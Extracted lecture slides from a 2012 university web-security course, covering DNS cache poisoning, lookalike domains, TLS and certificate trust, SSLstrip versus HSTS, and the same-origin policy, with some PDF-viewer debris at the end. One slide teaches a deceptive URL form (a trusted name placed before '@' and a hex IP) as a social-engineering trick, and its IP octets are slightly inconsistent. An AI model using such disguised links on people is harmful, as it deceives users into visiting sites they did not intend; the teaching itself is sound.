Web Security
Philipp Winter
philwint@kau.se
Karlstad University
Oct.11,2012
What does it contain?
The Web consists mostly of:
Protocols HTTP,TLS/X.509,DNS
Content HTML,Flash,JavaScript,...
What happens when you go to https://www.kau.se?
1.Your local DNS resolver sends a request for www.kau.se
which hopefully resolves to the correct IP address.
2.Your browser establishes a TCP connection to the IP address.
3.Your browser initiates a TLS connection and gets a certicate
which hopefully really belongs to kau.se.
4.Your browser fetches a web site which hopefully does not
contain malicious HTML or JavaScript.
There are many ways to mess with this process.
DNS
A Reminder
I
The Domain Name System maps host names to IP addresses.
I
Makes life easier for humans and provides additional
exibility.
I
DNS servers are queried for www.kau.se and return
193.10.226.10.
DNS Cache Poisoning
I
Conceptually similar to ARP cache poisoning.
I
Attacker wants victim to resolve www.kau.se to his own
malicious machine instead of the real KAU web server.
I
Attacker makes remote DNS cache store wrong mapping from
domain to IP address.
I
Mostly,cache poisoning is possible because DNS replies are
not signed.\Solution":DNSSEC.
I
ISPs have full control over DNS trac and can manipulate
search queries,e.g.to conduct censorship.
DNS { A More Exotic Problem
I
Certain characters in some fonts look very similar
(paypal.com/paypaI.com).
I
Non-ASCII in DNS names (punycode domains) made this
problem worse.
I
This problem is not limited to DNS!Can you think of
something else?
I
Bitcoin tackles this problem by avoiding certain characters
(0OIl) in addresses [1].
SSL/TLS
Overview (1/2)
I
Transport Layer Security is the successor of Secure Socket
Layer.
I
While TLS secures TCP-based trac,DTLS (Datagram TLS)
can be used for UDP.
I
Both are crypto protocols to protect condentiality,
authenticity and integrity.
I
SSL/TLS is used by web browsers,chat clients,VoIP
software,...[2]
I
HTTP!HTTPS,telnet!SSH,FTP!SFTP,...
Overview (2/2)
I
TLS is a layer between TCP and the application layer
protocol (e.g.HTTP).
I
Newest version is TLS 1.2.Standardized in 2008 but not yet
widely available in software.
I
Popular implementations:OpenSSL,GnuTLS,NSS.
TLS and X.509
I
X.509 is a PKI standard and species certicates,CRLs,path
validation algorithms and much more.
I
TLS is tightly coupled with X.509 certicates to provide
authentication.
I
openssl s
client -connect www.kau.se:443
I
openssl x509 -noout -text -inform PEM -in
cert.pem
Trusted Third Parties
I
Browsers contain dozens of root certicates of trusted third
parties.
I
Do you really trust these organizations you have never heard
of?
I
Reminder:It is enough if just one of them turns evil or gets
compromised [4]!
TLS and Speed
I
TLS can mean an overhead of 3.4 to 9 over unsecured trac
[3].
I
Public-key cryptography is the most expensive part (20% {
58%).
I
AES-NI is AES instruction set extension for x86 architecture
cat/proc/cpuinfo | grep --color=always aes
I
Speeds up AES if applications support it
I
Yet,Google and other huge content providers can aord to
enable TLS by default.
The TLS Handshake
Look at Ge's slides from last year.
Let's look at TLS on the wire!
SSLstrip { Preventing HTTPS from Being Used
I
Small tool by Moxie Marlinspike [5].
I
Scans HTTP trac and rewrites HTTPS-links to
HTTP-links.
I
Also modies the links to\appear"secure although they
aren't.
I
Very simple but highly eective attack.
HTTP Strict Transport Security
I
HSTS is a policy stating that web servers can tell that they
are to be accessed over HTTPS only.
I
Complying browser will automatically turn insecure HTTP
links into HTTPS links when HSTS is active for web server.
I
Important:SSLstrip attack becomes ineective.
I
Also,if authenticity is not present,there is no way to proceed
anyway.
Perspectives/Convergence
I
Observation:MITM is often local phenomenon.We might
be aected here,but not someone in Australia.
I
Let's see if in Australia,they see the same certicate!
I
perspectives and convergence,both browser addons,attempt
to do that.
How it Works
Source:ars technica
HTTP and the Web
Social Engineering using Weird URLs (1/2)
What web site is this?
http://www.kau.se@0xd822b52d
Social Engineering using Weird URLs (2/2)
I
216.34.181.48 is the A record of slashdot.org.
I
python -c"print
hex((216<<24)+(34<<16)+(181<<8)+(45))"
I
0xd822b52d is the IP address in hexadecimal and can be used
by browsers.
I
http://www.kau.se@0xd822b52d
The Same Origin Policy
I
Stops code in the twitter tab from messing with the code in
the facebook tab.
I
Code can only interact if the following three conditions hold:
I
Same domain (twitter.com 6= facebook.com)
I
Same application layer protocol (HTTPS 6= HTTP)
I
Same port number (443 6= 80)
I
So code can only interact if it's from the same origin!
Vulnerabilities in the Web
I
Browsers and web apps are insanely complex and partially
supersede operating systems.
I
Vast amount of vulnerabilities which often come down to
poor input validation.
I
XSS,CSRF,SQL injection,RFI,...
I
All these problems led to web application rewalls.
I
Safe playground:Damn Vulnerable Web Applications
(http://www.dvwa.co.uk).
Literature I
Base58Check encoding.
https://en.bitcoin.it/wiki/Base58Check_encoding.
OpenSSL Applications.
http://www.openssl.org/related/apps.html.
Cristian Coarfa,Peter Druschel,and Dan S.Wallach.
Performance Analysis of TLS Web Servers.
In Network & Distributed System Security Symposium.The Internet Society,
2002.
Dennis Fisher.
Comodo,DigiNotar Attacks Expose Crumbling Foundation of CA System.
https://threatpost.com/en_us/blogs/
comodo-diginotar-attacks-expose-crumbling-foundation-ca-system-090211.
Moxie Marlinspike.
sslstrip.
http://www.thoughtcrime.org/software/sslstrip/.
Enter the password to open this PDF file:
File name:
-
File size:
-
Title:
-
Author:
-
Subject:
-
Keywords:
-
Creation Date:
-
Modification Date:
-
Creator:
-
PDF Producer:
-
PDF Version:
-
Page Count:
-
Preparing document for printing…
0%
Comments 0
Log in to post a comment